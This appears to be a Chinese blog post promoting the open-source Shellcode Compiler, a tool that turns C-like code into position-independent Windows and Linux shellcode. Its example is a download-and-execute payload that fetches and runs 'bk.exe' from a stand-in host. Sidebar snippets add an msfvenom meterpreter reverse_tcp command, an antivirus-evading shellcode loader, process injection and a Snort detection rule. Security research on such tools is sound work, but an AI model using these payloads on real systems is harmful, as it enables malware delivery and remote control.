推荐开源项目:Shellcode Compiler - 简易且强大的代码转Shellcode工具

于 2024-05-15 10:08:08 发布
阅读量285 收藏 4
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00077/article/details/138896975
版权

推荐开源项目:Shellcode Compiler - 简易且强大的代码转Shellcode工具

项目地址:https://gitcode.com/NytroRST/ShellcodeCompiler

Shellcode Compiler是一个创新的开源程序,它可以将C/C++风格的代码编译成适用于Windows(x86和x64)及Linux(x86和x64)系统的精简、位置无关、NULL字符免的Shellcode。这个工具允许用户以友好的方式调用任何Windows API函数或Linux系统调用。

1. 项目介绍

Shellcode Compiler接收源代码文件作为输入,并利用其内置的编译器解释代码,然后使用Keystone引擎生成汇编代码,最终汇编成二进制Shellcode。用户可以通过简单的命令行选项定制输出,包括测试生成的Shellcode、指定平台、控制详细输出等。

2. 技术分析

该工具的核心是其自定义的编译器和Keystone引擎,后者是一个强大的动态二进制转换库,能够跨多个架构进行汇编语言的解析和编码。Shellcode Compiler巧妙地结合了这两个组件,为用户提供了一种无缝的接口来创建高效且安全的Shellcode。

3. 应用场景

  • 安全研究:用于编写安全漏洞的exploit。
  • 低级别编程:在资源受限环境中执行代码时,如恶意软件开发或逆向工程。
  • 教育目的:学习操作系统级别的编程,理解如何与内核交互。

4. 项目特点

  • 多平台支持:涵盖Windows和Linux的主要处理器架构。
  • 简洁API调用:无需复杂的汇编语法,可以直接调用系统函数。
  • 自动化流程:从源代码到Shellcode的整个过程自动化,简化工作流。
  • 易于使用:通过命令行选项进行配置,适合各种技术水平的开发者。
  • 测试功能:可直接测试生成的Shellcode,确保其正确运行。

尽管存在一些限制,如不能使用API返回值、指针或变量,但Shellcode Compiler作为一个Alpha版本,已经展现出了强大的潜力,并期待社区的反馈和改进。

示例

以下是如何在Windows和Linux平台上使用Shellcode Compiler的例子,以及一个基本的命令行调用示例:

// Windows示例
function URLDownloadToFileA("urlmon.dll");
function WinExec("kernel32.dll");
function ExitProcess("kernel32.dll");

URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
WinExec("bk.exe",0);
ExitProcess(0);

// Linux示例
chmod("/root/chmodme",511);
write(1,"Hello, world",12);
kill(1661,9);
getpid();
execve("/usr/bin/burpsuite",0,0);
exit(2);

// 调用示例
ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm -p win_x64

作者Ionut Popescu(@NytroRST) 创造的这个项目,是一个对底层编程和安全研究者极具价值的工具,值得你尝试并贡献你的智慧。

立即加入,体验Shellcode Compiler带来的强大功能,一起探索系统的深处。

项目地址:https://gitcode.com/NytroRST/ShellcodeCompiler

gitblog_00077
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
shellcodeunicode工具
06-13
这是一款超级便宜的shellcodeunicode工具,非常好用!
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件基金会发布的GNU通用公共许可证的条款(许可证的版本3)或(可选)任何更高版本来重新分发和/或修改它。 发行Shellcode-Extractor的目的是希望它会有用,但没有任何担保; 甚至没有对适销性或特定用途适用性的暗示保证。 有关更多详细信息,请参见GNU通用公共许可证。 您应该已经与该程序一起收到了GNU通用公共许可证的副本。 如果没有,请参阅 联系方式: 由于研究和研究原因而开发的工具,希望它会有用。 用法 编写汇编代码,生成目标文件,并在管道中使用此脚本到objdump
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
Custom Shellcode
05-16
Custom Shellcode 代码参考.
php shellcode,Windows Shellcode学习笔记
weixin_34385935的博客
03-24 247
0x00 前言Windows Shellcode学习笔记——通过VisualStudio生成shellcodeshellcode是一段机器码,常用作漏洞利用中的载荷(也就是payload)。在渗透测试中,最简单高效的方式是通过metasploit生成shellcode,然而在某些环境下,需要定制开发自己的shellcode,所以需要对shellcode的开发作进一步研究。0x01 简介编写She...
java代码审计工具_Java代码审计汇总系列(六)——RCE
weixin_42315341的博客
02-16 1421
一、概述任意代码执行(Remote Code Execution)是危害最为严重的漏洞之一,挖掘难度也是相对高的,除了常见的文件上传漏洞,还有OS命令注入、表达式注入、模板注入、代码注入和第三方组件漏洞,下面依次讲解审计方法和技巧。二、分类挖掘技巧1、OS命令注入OS命令注入涉及执行系统命令,通过关键字定位执行命令的方法是否参数可控,常用的搜索关键字有:System|exec|passthru|...
shellcode教程从新手到高手
weixin_34040079的博客
03-08 2180
P3nro5e · 2014/12/08 11:320x00 介绍与工具安装在这个站点中的这套教程目的在于利用汇编代码来生成自己的shellcode,它将有希望地被包含在"Project Shellcode Development Framework"(shellcode 开发框架项目)中Windows shellcode和linux shellcode 的不同点是什么?这个教程的一些内容是以在h...
ZSC:OWASP ZSC-Shellcode混淆代码生成器
02-04
OWASP ZSC是用python编写的开源软件,可让您生成自定义的shellcode并将脚本换为混淆的脚本。 可以使用python在Windows / Linux / OSX上运行该软件。 OWASP页面: : 文件: : 主页:http: 功能:http: ...
chiralium:Windows的Shellcode-to-binary生成器
05-08
手性描述只是一个简单的工具,可以使用Golang从shellcode生成二进制文件。 当然,您需要能够“构建”。 您也可以指定自己的shellcode或使用msfvenom即时生成一个抄表器reverse_https(x86或x64)。 为了避免静态...
HEVD 内核攻击: 编写Shellcode(三)
weixin_34362875的博客
09-20 244
本文讲的是HEVD 内核攻击: 编写Shellcode(三), 在上一篇文章中,我们已经能以可控的方式使用内核了。但是,当创建Windows内核漏洞利用时,目标通常都是希望以某种方式获得更高的权限,通常是SYSTEM权限。这时我们就必须用到内核有效载荷。 窃取进程token 使用这个方法的最终目标是使用SYSTEM级别访问权限打开命令提示符。一旦我们在...
超棒的嵌入式学习资源汇总
欲穷千里目,更上一层楼
11-15 196
精选嵌入式学习资源汇总
1xbet.apk
最新发布
06-04
1xbet.apk
基于Matlab的BP神经网络的非线性系统建模-非线性函数拟合
06-04
【作品名称】:基于Matlab的BP神经网络的非线性系统建模-非线性函数拟合 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:基于Matlab的BP神经网络的非线性系统建模-非线性函数拟合
java等值面图片生成代码实现功能.zip
06-04
采用java引用geotools生成等值面,集成sld按照指定样式生成等值面图片
111.py
06-04
111.py
2247.瑞金北关杨氏族谱: 不分卷:[江西瑞金].pdf
06-04
2247.瑞金北关杨氏族谱: 不分卷:[江西瑞金]
alert tcp any any -> any any (msg:"ET SHELLCODE Rothenburg Shellcode"; flow:established; content:"|D9 74 24 F4 5B 81 73 13|"; content:"|83 EB FC E2 F4|"; distance:0; reference:url,doc.emergingthreats.net/2009247; classtype:shellcode-detect; sid:2009247; rev:3; metadata:created_at 2010_07_30, updated_at 2010_07_30;)
05-25
这是一个 Snort IDS 规则,用于检测 Rothenburg Shellcode 的网络流量。...Rothenburg Shellcode 是一种常见的恶意软件代码,它可以在受感染的计算机上执行任意代码,通常用于远程控制和信息窃取等攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gitblog_00077

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值